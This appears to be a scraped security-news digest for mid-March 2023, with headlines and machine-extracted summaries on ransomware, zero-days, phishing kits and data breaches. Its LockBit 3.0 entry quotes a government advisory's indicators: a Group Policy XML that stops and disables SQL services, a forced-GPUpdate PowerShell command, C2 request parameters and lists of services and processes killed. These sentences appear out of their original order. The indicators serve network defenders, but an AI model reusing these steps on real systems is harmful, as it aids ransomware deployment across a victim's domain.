                2023-03-15 https://www.bleepingcomputer.com/news/security/us-federal-agency-hacked-using-old-telerik-bug-to-steal-data/
                Last year, a U.S. federal agency's Microsoft Internet Information Services (IIS) web server was hacked by exploiting a critical .NET deserialization vulnerability in the Progress Telerik UI for ASP.NET AJAX component. [...] "

                Autosummary: "In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory," the three organizations also recommended. "


                Healthcare provider ILS warns 4.2 million people of data breach

                financial
                2023-03-15 https://www.bleepingcomputer.com/news/security/healthcare-provider-ils-warns-42-million-people-of-data-breach/
                Independent Living Systems (ILS), a Miami-based healthcare administration and managed care solutions provider, suffered a data breach that exposed the personal information of 4,226,508 individuals. [...] "

                Autosummary: "


                ChipMixer platform seized for laundering ransomware payments, drug sales

                exploits ransomware
                2023-03-15 https://www.bleepingcomputer.com/news/security/chipmixer-platform-seized-for-laundering-ransomware-payments-drug-sales/
                An international law enforcement operation has seized the cryptocurrency mixing service "ChipMixer" which is said to be used by hackers, ransomware gangs, and scammers to launder their proceeds. [...] "

                Autosummary: "Minh Quốc Nguyễn, 49, of Hanoi, Vietnam, was charged today in Philadelphia with money laundering, operating an unlicensed money transmitting business and identity theft, connected to the operation of ChipMixer," announced the U.S. Department of Justice in a press statement. "


                ChatGPT may be a bigger cybersecurity risk than an actual benefit

                ciber
                2023-03-15 https://www.bleepingcomputer.com/news/security/chatgpt-may-be-a-bigger-cybersecurity-risk-than-an-actual-benefit/
                ChatGPT made a splash with its believable AI-generated responses. However, it can help threat actors create convincing personas to steal credentials in phishing attacks. [...] "

                Autosummary: Detecting AI-generated content (Source: Specops): You can use this tool to help identify AI-generated text: https://gptzero.me/. Social engineering on the rise with ChatGPT: From fake support requests, to caller ID spoofing, and now even scripting with ChatGPT. The user can be verified with a one-time code sent to the mobile number associated with their Active Directory account, or even with existing authentication services, like Duo Security, Okta, PingID, and Symantec VIP. Furthermore, since the underlying language-model technology is widely available, an enterprising individual could create a dataset of existing company-generated emails to create a tool that quickly and easily produces phishing emails. "


                YoroTrooper Stealing Credentials and Information from Government and Energy Organizations

                government industry
                2023-03-15 https://thehackernews.com/2023/03/yorotrooper-stealing-credentials-and.html
                A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022. "Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots," Cisco "

                Autosummary: "


                H2 2022 – brief overview of main incidents in industrial cybersecurity

                industry ciber
                2023-03-15 https://ics-cert.kaspersky.com/publications/h2-2022-brief-overview-of-main-incidentsin-industrial-cybersecurity/
                In this overview, we discuss cybercriminal and hacktivist attacks on industrial organizations. "

                Autosummary: Hive Ransomware: The Cybersecurity and Infrastructure Security Agency (CISA), together with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), published a joint alert about the Hive ransomware group, which targeted a wide range of businesses and infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health. The ALPHV ransomware gang, aka BlackCat, claimed responsibility for the cyberattack against Creos and added it to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails. On December 29, the LockBit ransomware gang took responsibility for the attack against the port, claiming to have stolen financial reports, audits, budgets, contracts, ship logs and other information about cargo and crews. The data leaked includes bank account details, dates of birth, next-of-kin information, national insurance numbers and tax information, health and well-being information, disciplinary and grievance related documents, etc. The attackers used known vulnerabilities (CVE-2022-24521, CVE-2020-1472), phishing, PowerShell scripts, KerberCache tool, compromised credentials and RDP to gain access, then used the Hancitor loader to drop their ransomware. From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries. According to the company’s statement, data that was unlawfully accessed potentially included personal information (including names, emails, addresses, taxpayer identification numbers, and banking information of affected individuals and businesses). U-blox: U-blox, a Swiss company that creates wireless semiconductors and modules for consumer, automotive and industrial markets, said on October 28 that it had been targeted by a ransomware attack, which was detected and contained on October 24. Tata Power: On October 14, the largest Indian energy company, Tata Power Company Limited, confirmed that it was targeted by a cyberattack, which affected its IT infrastructure. EPM: In December, Empresas Públicas de Medellín (EPM), a Colombian energy provider, was hit with a ransomware attack, which disrupted the company’s operations and took down online services. The hackers uploaded a sample of the stolen files, including employment contracts, supplier contracts, files on various employees, documents detailing executive compensation packages, and more. Information stolen by the attackers may have included employee names, addresses, dates of birth, direct deposit information, ethnicity, and Social Security numbers. Elbit Systems: Elbit Systems of America, a subsidiary of Israeli defense contractor Elbit Systems, confirmed a data breach, several months after a ransomware gang claimed to have hacked the company’s systems. The RansomEXX ransomware gang took responsibility for the “malicious cyberactivity” and for stealing 29.9GB of files pertaining to non-disclosure agreements, passports, IDs, contracts, and supply agreements. The company didn’t name the attacker, but BleepingComputer, which saw a ransom note on one of Semikron's systems, reported that LV Ransomware might be behind the attack and that they claim to have stolen two terabytes of company data. Eurocell: Eurocell, a UK-based PVC-U manufacturer, was hit by a cyberattack, which led to critical personal details of employees being leaked. The main targets of Cuba ransomware attacks are financial services, government, healthcare and public health, critical manufacturing, and information technology. "


                FBI: Ransomware hit 860 critical infrastructure orgs in 2022

                exploits ransomware
                2023-03-15 https://www.bleepingcomputer.com/news/security/fbi-ransomware-hit-860-critical-infrastructure-orgs-in-2022/
                The Federal Bureau of Investigation (FBI) revealed in its 2022 Internet Crime Report that ransomware gangs breached the networks of at least 860 critical infrastructure organizations last year. [...] "

                Autosummary: FBI has issued multiple advisories, Private Industry Notifications (PINs), and flash alerts in recent years, warning of ransomware attacks against critical infrastructure, including Healthcare and First Responder networks, Water and Wastewater Systems, the Food and Agriculture sector, and education institutions. "


                LockBit ransomware claims Essendant attack, company says “network outage”

                exploits ransomware
                2023-03-15 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-claims-essendant-attack-company-says-network-outage-/
                LockBit ransomware has claimed a cyber attack on Essendant, a wholesale distributor of office products after a "significant" and ongoing outage knocked the company’s operations offline. [...] "

                Autosummary: Braves, Bulldogs, Falcons, Hawks, Freedom (@KTrill311) March 9, 2023 The fact I haven’t been able to do my job for most of this week is unacceptable @Essendant — Derek (@DerekHasSeaLegs) March 9, 2023 The "network outage" is ransomware As of March 14th, LockBit ransomware gang has claimed responsibility for the cyber attack on Essendant. "


                Microsoft has another go at closing security hole exploited by Magniber ransomware

                exploits ransomware
                2023-03-15 https://www.bitdefender.com/blog/hotforsecurity/microsoft-has-another-go-at-closing-security-hole-exploited-by-magniber-ransomware/
                In its latest Patch Tuesday bundle of security fixes, Microsoft has patched a security flaw that was being used by the Magniber cybercrime gang to help them infect computers with ransomware. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                CISA warns of Adobe ColdFusion bug exploited as a zero-day

                exploits
                2023-03-15 https://www.bleepingcomputer.com/news/security/cisa-warns-of-adobe-coldfusion-bug-exploited-as-a-zero-day/
                CISA has added a critical vulnerability impacting Adobe ColdFusion versions 2021 and 2018 to its catalog of security bugs exploited in the wild. [...] "

                Autosummary: "


                Update now! Microsoft fixes two zero-day bugs

                exploits
                2023-03-15 https://www.malwarebytes.com/blog/news/2023/03/update-now-microsoft-fixes-two-zero-day-bugs

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: patch Tuesday

                Tags: March

                Tags: 2023

                Tags: Microsoft

                Tags: Adobe

                Tags: Fortinet

                Tags: Android

                Tags: SAP

                Tags: CVE-2023-23397

                Tags: CVE-2023-24880

                Tags: CVE-2023-26360

                Tags: CVE-2022-41328

                This Patch Tuesday, Microsoft has released fixes for two actively exploited zero-days and Adobe has fixed one.

                (Read more...)

                The post Update now! Microsoft fixes two zero-day bugs appeared first on Malwarebytes Labs.

                "

                Autosummary: Commerce APSB23-17, Experience Manager APSB23-18, Illustrator APSB23-19, Dimension APSB23-20, Creative Cloud Desktop Application APSB23-21, Substance 3D Stager APSB23-22, and Photoshop APSB23-23. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then returns the result of this operation to the service. "


                H2 2022 – brief overview of main incidents in industrial cybersecurity

                industry ciber
                2023-03-15 https://ics-cert.kaspersky.com/publications/h2-2022-brief-overview-of-main-incidents-in-industrial-cybersecurity/
                In this overview, we discuss cybercriminal and hacktivist attacks on industrial organizations. "

                Autosummary: "


                #StopRansomware: LockBit 3.0

                exploits ransomware ciber
                2023-03-15 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

                SUMMARY

                Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                Actions to take today to mitigate cyber threats from ransomware:

                The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.

                The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.

                The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

                Download the PDF versio "

                Autosummary: xml version="1.0" encoding="utf-8"?> <NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLPBENGINE" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLFDLauncher" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLSERVERAGENT" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSASTELEMETRY" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0"> <Properties 
startupType="DISABLED" serviceName="SQL Server Distributed Replay Client" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Controller" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MsDtsServer150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISTELEMETRY150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLLaunchpad" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> 
<Properties startupType="DISABLED" serviceName="SQLTELEMETRY" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/> </NTService>Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl Example of information found in encrypted data { "bot_version":"X", "bot_id":"X", "bot_company":"X", "host_hostname":"X", "host_user":"X", "host_os":"X", "host_domain":"X", "host_arch":"X", "host_lang":"X", "disks_info":[ { "disk_name":"X", "disk_size":"XXXX", "free_size":"XXXXX" } User Agent Strings Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edge/91.0.864.37 <NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}"> <NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s"> <Properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/> Services.xml stops and disables services on the Active Directory (AD) hosts. RESOURCES REPORTING The FBI is seeking any information that can be legally shared, including: Boundary logs showing communication to and from foreign IP addresses Sample ransom note Communications with LockBit 3.0 actors Bitcoin wallet information Decryptor files Benign sample of an encrypted file The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. 
Registry Artifacts LockBit 3.0 Icon Registry Key Value Data HKCR\.<Malware Extension> (Default) <Malware Extension> HKCR\<Malware Extension>\DefaultIcon (Default) C:\ProgramData\<Malware Extension>.ico LockBit 3.0 Wallpaper Registry Key Value Data HKCU\Control Panel\Desktop\WallPaper (Default) C:\ProgramData\<Malware Extension>.bmp Disable Privacy Settings Experience Registry Key Value Data SOFTWARE\Policies\Microsoft\Windows\OOBE DisablePrivacyExperience 0 Enable Automatic Logon Registry Key Value Data SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoAdminLogon 1 DefaultUserName <username> Force GPUpdate Powershell Command powershell Get-ADComputer -filter * -Searchbase "%s" | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0} Services Killed vss sql svc$ memtas mepocs msexchange sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr Processes Killed sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc firefox tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspu onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad LockBit 3.0 Ransom Note ~~~ LockBit 3.0 the world’s fastest and most stable ransomware from 2019~~~ >>>>>Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC. [TA0002] Enabling automatic logon for persistence and privilege escalation [T1547] Deleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485], [T1490] LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. 
EXFILTRATION LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. LockBit 3.0 performs functions such as: Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices [T1082] Terminating processes and services [T1489] Launching commands VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. Mutual Exclusion Object (Mutex) Created When executed, LockBit 3.0 will create the mutex, Global\<MD4 hash of machine GUID>, and check to see if this mutex has already been created to avoid running more than one instance of the ransomware. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud). The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023. 
The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722). [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud). "


                Fortinet FortiOS Flaw Exploited in Targeted Cyberattacks on Government Entities

                exploits government ciber
                2023-03-14 https://thehackernews.com/2023/03/fortinet-fortios-flaw-exploited-in.html
                Government entities and large organizations have been targeted by an unknown threat actor by exploiting a security flaw in Fortinet FortiOS software to result in data loss and OS and file corruption. "The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers Guillaume Lovet and Alex Kong said in an "

                Autosummary: The disclosure comes days after Fortinet released patches to address 15 security flaws, including CVE-2022-41328 and a critical heap-based buffer underflow issue impacting FortiOS and FortiProxy (CVE-2023-25610, CVSS score: 9.3). "


                Dissecting the malicious arsenal of the Makop ransomware gang

                exploits ransomware
                2023-03-14 https://securityaffairs.com/143452/malware/dissecting-makop-ransomware.html

                Cyber security researcher Luca Mella analyzed the Makop ransomware employed in a recent intrusion. Executive summary Introduction The Makop ransomware operators started their infamous criminal business in 2020 leveraging a new variant of the notorious Phobos ransomware. During the last years, the gang maintained a solid presence in the criminal underground even if they did […]

                The post Dissecting the malicious arsenal of the Makop ransomware gang appeared first on Security Affairs.

                "

                Autosummary: Indicators of Compromise and Yara Rules are available in the original post published by Luca Mella https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11 About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”. Compilation timestamp (left), main routine (right) During recent Makop intrusions, the tool has been coupled with another executable named “c.exe”, but, unfortunately, it has been erased by the attackers during the disengagement phase. Filename: Everything.exe md5: b69d036d1dcfc5c0657f3a1748608148 The last interesting tool spotted in the Makop arsenal is a particular system administration tool rarely used in the Russian criminal underground. "


                FBI reveals that more money is lost to investment fraud than ransomware and business email compromise combined

                financial exploits ransomware
                2023-03-14 https://www.bitdefender.com/blog/hotforsecurity/fbi-reveals-that-more-money-is-lost-to-investment-fraud-than-ransomware-and-business-email-compromise-combined/
                The latest annual FBI report on the state of cybercrime has shown a massive increase in the amount of money stolen through investment scams. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                CISA warns CI operators about vulnerabilities on their networks exploited by ransomware gangs

                exploits ransomware
                2023-03-14 https://www.helpnetsecurity.com/2023/03/14/cisa-ransomware-vulnerabilities/

                Organizations in critical infrastructure sectors whose information systems contain security vulnerabilities associated with ransomware attacks are being notified by the US Cybersecurity and Infrastructure Security Agency (CISA) and urged to implement a fix. A pilot program to strengthen critical infrastructure against ransomware “CISA leverages multiple open-source and internal tools to research and detect vulnerabilities within U.S. critical infrastructure,” the agency explained in the formal announcement of its Ransomware Vulnerability Warning Pilot (RVWP). “CISA additionally leverages … More

                The post CISA warns CI operators about vulnerabilities on their networks exploited by ransomware gangs appeared first on Help Net Security.

                "

                Autosummary: "


                GoBruteforcer: New Golang-Based Malware Breaches Web Servers Via Brute-Force Attacks

                exploits
                2023-03-14 https://thehackernews.com/2023/03/gobruteforcer-new-golang-based-malware.html
                A new Golang-based malware dubbed GoBruteforcer has been found targeting web servers running phpMyAdmin, MySQL, FTP, and Postgres to corral the devices into a botnet. "GoBruteforcer chose a Classless Inter-Domain Routing (CIDR) block for scanning the network during the attack, and it targeted all IP addresses within that CIDR range," Palo Alto Networks Unit 42 researchers said. "The threat actor "

                Autosummary: The malware is mainly designed to single out Unix-like platforms running x86, x64 and ARM architectures, with GoBruteforcer attempting to obtain access via a brute-force attack using a list of credentials hard-coded into the binary. "


                The Prolificacy of LockBit Ransomware

                exploits ransomware
                2023-03-14 https://thehackernews.com/2023/03/the-prolificacy-of-lockbit-ransomware.html
                Today, the LockBit ransomware is the most active and successful cybercrime organization in the world. Attributed to a Russian Threat Actor, LockBit has stepped out from the shadows of the Conti ransomware group, who were disbanded in early 2022. LockBit ransomware was first discovered in September 2019 and was previously known as ABCD ransomware because of the ".abcd virus" extension first "

                Autosummary: With over 11 years of experience across various sectors like Financial Services, Retail, Insurance, Government, and Telecommunications, Aaron is a certified GCDA and has expertise in incident response, threat hunting, vulnerability management, cyber security operations, threat intelligence, and consultancy. Initial attack vectors of LockBit include social engineering, such as phishing, spear phishing, and business email compromise (BEC), exploiting public-facing applications, hiring initial access brokers (IABs), and using stolen credentials to access valid accounts, such as remote desktop protocol (RDP), as well as brute-force cracking attacks. "


                Microsoft Warns of Large-Scale Use of Phishing Kits to Send Millions of Emails Daily

                financial
                2023-03-14 https://thehackernews.com/2023/03/microsoft-warns-of-large-scale-use-of.html
                An open source adversary-in-the-middle (AiTM) phishing kit has found a number of takers in the cybercrime world for its ability to orchestrate attacks at scale. Microsoft Threat Intelligence is tracking the threat actor behind the development of the kit under its emerging moniker DEV-1101. An AiTM phishing attack typically involves a threat actor attempting to steal and intercept a target’s "

                Autosummary: The service-based economy that fuels such offerings can also result in double theft, wherein the stolen credentials are sent to both the phishing-as-a-service provider as well as their customers. "


                Cybercriminals exploit SVB collapse to steal money and data

                financial exploits ciber
                2023-03-14 https://www.bleepingcomputer.com/news/security/cybercriminals-exploit-svb-collapse-to-steal-money-and-data/
                The collapse of the Silicon Valley Bank (SVB) on March 10, 2023, has sent ripples of turbulence throughout the global financial system, but for hackers, scammers, and phishing campaigns, it’s becoming an excellent opportunity. [...] "

                Autosummary: Claim about an SVB-themed BEC attempt (Mastodon) Cyber-intelligence firm Cyble published a similar report today exploring developing SVB-themed threats, warning about these additional domains: svbdebt[.]com svbclaims[.]net svb-usdc[.]com svb-usdc[.]net svbi[.]io banksvb[.]com svbank[.]com svblogin[.]com Many of these sites were registered on the day of the bank’s collapse, March 10, 2023, and are already hosting cryptocurrency scams. "


                YoroTrooper cyberspies target CIS energy orgs, EU embassies

                industry
                2023-03-14 https://www.bleepingcomputer.com/news/security/yorotrooper-cyberspies-target-cis-energy-orgs-eu-embassies/
                A new threat actor named "YoroTrooper" has been running cyber-espionage campaigns since at least June 2022, targeting government and energy organizations in Commonwealth of Independent States (CIS) countries. [...] "

                Autosummary: Stink can collect credentials, bookmarks, and browsing data from Chrome-based browsers, while it can also snap screenshots and steal data from Filezilla, Discord, and Telegram. "


                STALKER 2 hacker demands Ukrainian game developer reinstates Russian language support, or else…

                government rusia-ucrania
                2023-03-14 https://grahamcluley.com/stalker-2-hacker-demands-ukrainian-game-developer-reinstates-russian-language-support-or-else/
                A Ukrainian video game developer has revealed that a hacker has leaked development material stolen from the company’s systems, and is threatening to release tens of gigabytes more if their unorthodox ransom demands are not met. "

                Autosummary: In a post on the Russian social media site VK (also known as VKontakte, effectively the Russian version of Facebook), a statement was posted demanding that the game have Russian voice acting reinstated (it was removed following the invasion of Ukraine), apologise to players based in Russia and Belarus, and unban an account on the game’s Discord channel. The first-person shooter game, developed by Ukraine-based GSC Game World, is hotly anticipated by fans of its prequel “STALKER: Shadow of Chernobyl,” but isn’t scheduled to be released until December 2023. "


                DEV-1101 AiTM phishing kit is fueling large-scale phishing campaigns

                financial
                2023-03-14 https://securityaffairs.com/143466/cyber-crime/dev-1101-phishing-kit.html

                Microsoft warns of large-scale phishing attacks orchestrated with an open-source adversary-in-the-middle (AiTM) phishing kit available in the cybercrime ecosystem Adversary-in-the-middle (AiTM) phishing kits are becoming an essential technology in the cybercrime ecosystem that is used by multiple threat actors to launch phishing attacks. AiTM phishing allows threat actors to circumvent multifactor authentication (MFA) through reverse-proxy functionality. […]

                The post DEV-1101 AiTM phishing kit is fueling large-scale phishing campaigns appeared first on Security Affairs.

                "

                Autosummary: Microsoft warns of large-scale phishing attacks orchestrated with an open-source adversary-in-the-middle (AiTM) phishing kit available in the cybercrime ecosystem Adversary-in-the-middle (AiTM) phishing kits are becoming an essential technology in the cybercrime ecosystem that is used by multiple threat actors to launch phishing attacks. "


                NatWest limits cryptocurrency transfers over scam fears

                financial
                2023-03-14 https://www.bbc.co.uk/news/technology-64954119?at_medium=RSS&at_campaign=KARANGA
                Customers will be able to transfer a maximum of £1,000 a day and up to £5,000 per month. "

                Autosummary: "


                Rubrik confirms data theft in GoAnywhere zero-day attack

                exploits
                2023-03-14 https://www.bleepingcomputer.com/news/security/rubrik-confirms-data-theft-in-goanywhere-zero-day-attack/
                Cybersecurity company Rubrik has confirmed that its data was stolen using a zero-day vulnerability in the Fortra GoAnywhere secure file transfer platform. [...] "

Autosummary: Rubrik is listed on the Clop ransomware data leak site Source: BleepingComputer The Clop ransomware gang has claimed responsibility for the Fortra GoAnywhere attacks, telling BleepingComputer that they breached 130 organizations to steal data over ten days. "


                Microsoft fixes Outlook zero-day used by Russian hackers since April 2022

                exploits rusia-ucrania
                2023-03-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-zero-day-used-by-russian-hackers-since-april-2022/
Microsoft has patched an Outlook zero-day vulnerability (CVE-2023-23397) exploited by a hacking group linked to Russia's military intelligence service GRU to target European organizations. [...] "

                Autosummary: The hacking group (tracked as APT28, STRONTIUM, Sednit, Sofacy, and Fancy Bear) sent malicious Outlook notes and tasks to steal NTLM hashes via NTLM negotiation requests by forcing the targets’ devices to authenticate to attacker-controlled SMB shares. "


                Microsoft fixes Windows zero-day exploited in ransomware attacks

                exploits ransomware
                2023-03-14 https://www.bleepingcomputer.com/news/security/microsoft-fixes-windows-zero-day-exploited-in-ransomware-attacks/
                Microsoft has patched another zero-day bug used by attackers to circumvent the Windows SmartScreen cloud-based anti-malware service and deploy Magniber ransomware payloads without raising any red flags. [...] "

                Autosummary: "


                Microsoft March 2023 Patch Tuesday fixes 2 zero-days, 83 flaws

                exploits
                2023-03-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2023-patch-tuesday-fixes-2-zero-days-83-flaws/
Today is Microsoft's March 2023 Patch Tuesday, and security updates fix two actively exploited zero-day vulnerabilities and a total of 83 flaws. [...] "

Autosummary: The number of bugs in each vulnerability category is listed below:
• 21 Elevation of Privilege Vulnerabilities
• 2 Security Feature Bypass Vulnerabilities
• 27 Remote Code Execution Vulnerabilities
• 15 Information Disclosure Vulnerabilities
• 4 Denial of Service Vulnerabilities
• 10 Spoofing Vulnerabilities
• 1 Edge - Chromium Vulnerability
This count does not include twenty-one Microsoft Edge vulnerabilities fixed yesterday. "


                Microsoft patches zero-days used by state-sponsored and ransomware threat actors (CVE-2023-23397, CVE-2023-24880)

                exploits government ransomware
                2023-03-14 https://www.helpnetsecurity.com/2023/03/14/cve-2023-23397-cve-2023-24880/

